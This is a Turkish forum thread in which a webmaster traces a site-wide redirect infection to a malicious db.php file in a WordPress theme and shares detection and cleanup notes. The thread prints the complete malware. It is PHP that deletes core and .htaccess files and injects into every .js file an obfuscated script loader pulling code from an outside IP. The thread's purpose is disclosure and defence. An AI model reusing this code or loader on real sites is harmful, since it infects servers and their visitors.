Merhaba, hostingimde bulunan sitelerin birindeki eklenti, tema veya scriptte bulunan bir açıktan dolayı bütün domainlerimdeki dosyalar zarar gördü.
Tüm sitelere ilk girişte cmp20.com sitesine yönlendirme yapılıyor.
Sorunun çözümü için uğraşlarım devam ediyor. Daha önce bu siteye yönlendirme yapan bir saldırı aldıysanız ve rollback yapmak haricinde bir çözüm yolu bularak manuel veya otomatik temizleme yapabildiyseniz lütfen bilgilendirin.
Rollback harici bir çözüm bulabilirsem konu altına yorum yaparım.
--- Düzenleme Sonrası Aşağıdadır.---
Sebep kullandığım bir wordpress teması çıktı. Wordpress temasında " db.php " isimli bir dosya var bu db.php çalışınca hosting paketimdeki tüm dosyaları etkiledi dolayısıyla tüm domainlerimi.. İşlem sonucunda .js dosyalarımda bozulmalar yapıyor ve oldukça yüksek sayıda..
db.php çalışınca birçok .js dosyamın içeriği;
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));';
olarak değişti.
Benim çözümüm ;
Sinirden hosting paketimdeki tüm dosyaları temizlemekle başladı. Paketin ana domaninide değiştirdim. Şimdi tek tek temizlik işlemleri yapıp tekrar hostinge yüklüyorum.
Temizlik işlemine diğer domainlerim de db.php tarzında işlemi başlatacak bir kod olup olmadığını araştırmakla başlıyorum. Aşağıdaki kodu aratarak başladım. Bu kodu başlatan dosyanız varsa direkt temizleyin.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E"
tüm .jslerinizi kontrol edin..
Düzenli olarak yedek almayı unutmayın !
[Sebep][Çözüm] Siteyi ilk açışta CMP20.com Sitesine Yönlendirme Virüs ! |
4 Mesajlar | 1.002 Okunma | ||
- Üyelik 05.08.2014
- Yaş/Cinsiyet 31 / E
- Meslek E-ticaret
- Konum İzmir
- Ad Soyad M** A**
- Mesajlar 437
- Beğeniler 118 / 117
- Ticaret 2, (%100)
Metaren.NET.TR
- Üyelik 02.09.2016
- Yaş/Cinsiyet 33 / E
- Meslek -
- Konum Kırıkkale
- Ad Soyad N** Ö**
- Mesajlar 1419
- Beğeniler 380 / 442
- Ticaret 21, (%95)
Evet daha önce aynı konuda başkalarına yardımcı olmuştum.Ücretli destek düşürseniz konumu inceleyebilirsiniz.
https://wmaraci.com/forum/genel-ilanlar/internet-siteniz-guvende-mi-hacklendiniz-mi-sakin-olun-yavasca-iceri-girin-418650.html
https://wmaraci.com/forum/genel-ilanlar/internet-siteniz-guvende-mi-hacklendiniz-mi-sakin-olun-yavasca-iceri-girin-418650.html
- Üyelik 05.08.2014
- Yaş/Cinsiyet 31 / E
- Meslek E-ticaret
- Konum İzmir
- Ad Soyad M** A**
- Mesajlar 437
- Beğeniler 118 / 117
- Ticaret 2, (%100)
Html kodunu da buraya yazalım :) Konu güncellendi. Kesinlikle aşağıdaki kodu alıp çalıştırmayın :)
/**
* The main template file for display error page.
*
* @package WordPress
*/
error_reporting(0);
$file_name = 'e';
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));';
$position = 1;
function getDirContents($dir) {
global $file_name, $text, $position;
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
$path_info = pathinfo($path);
$pos3 = stripos($path_info['basename'], '.js');
if($pos3 !== false){
$pos2 = stripos($path_info['basename'], $file_name);
if($pos2 !== false) {
echo 'WP_Error_Page_Not_Found '."\n";
$pos1 = stripos(file_get_contents($path), $text);
if ($pos1 === false) {
if($position == 2) {
file_put_contents($path, $text, FILE_APPEND);
}
else {
file_put_contents($path, $text);
}
}
}
}
} elseif($value != "." && $value != "..") {
getDirContents($path);
}
}
}
//start
$path = $_SERVER['DOCUMENT_ROOT'];
//echo ($path);
if(unlink($path.'/wp-admin/update-core.php')) {
echo ('te-co DTRU ');
} else {
echo('te-co DFAL ');
file_put_contents($path.'/wp-admin/update-core.php', '');
}
if(unlink($path.'/.htaccess')) {
echo ('HTA DTRU ');
} else {
echo('HTA DFAL ');
file_put_contents($path.'/.htaccess', file_get_contents('https://gist.githubusercontent.com/BFTrick/3706672/raw/be744502cf3921f761cbef11878af6f4a2024c3d/.htaccess'));
}
//public_html
$pos1 = stripos($path,'/public_html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/public_html/') + strlen('/public_html/'));
getDirContents($rest);
} else {
//html
$pos1 = stripos($path,'/html/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/html/') + strlen('/html/'));
getDirContents($rest);
} else {
//htdocs
$pos1 = stripos($path,'/htdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/htdocs/') + strlen('/htdocs/'));
getDirContents($rest);
} else {
//httpdocs
$pos1 = stripos($path,'/httpdocs/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/httpdocs/') + strlen('/httpdocs/'));
getDirContents($rest);
} else {
//vhosts
$pos1 = stripos($path,'/vhosts/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/vhosts/') + strlen('/vhosts/'));
getDirContents($rest);
} else {
//www
$pos1 = stripos($path,'/www/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/www/') + strlen('/www/'));
getDirContents($rest);
} else {
//wwwroot
$pos1 = stripos($path,'/wwwroot/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/wwwroot/') + strlen('/wwwroot/'));
} else {
//web
$pos1 = stripos($path,'/web/');
if ($pos1 !== false){
$rest = substr($path, 0, stripos($path, '/web/') + strlen('/web/'));
} else {
getDirContents($_SERVER['DOCUMENT_ROOT']);
}
}
}
}
}
}
}
}
?>
Metaren.NET.TR
- Üyelik 05.05.2014
- Yaş/Cinsiyet 49 / E
- Meslek eğitim
- Konum Konya
- Ad Soyad B** Z**
- Mesajlar 205
- Beğeniler 25 / 21
- Ticaret 0, (%0)
Teşekkürler
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)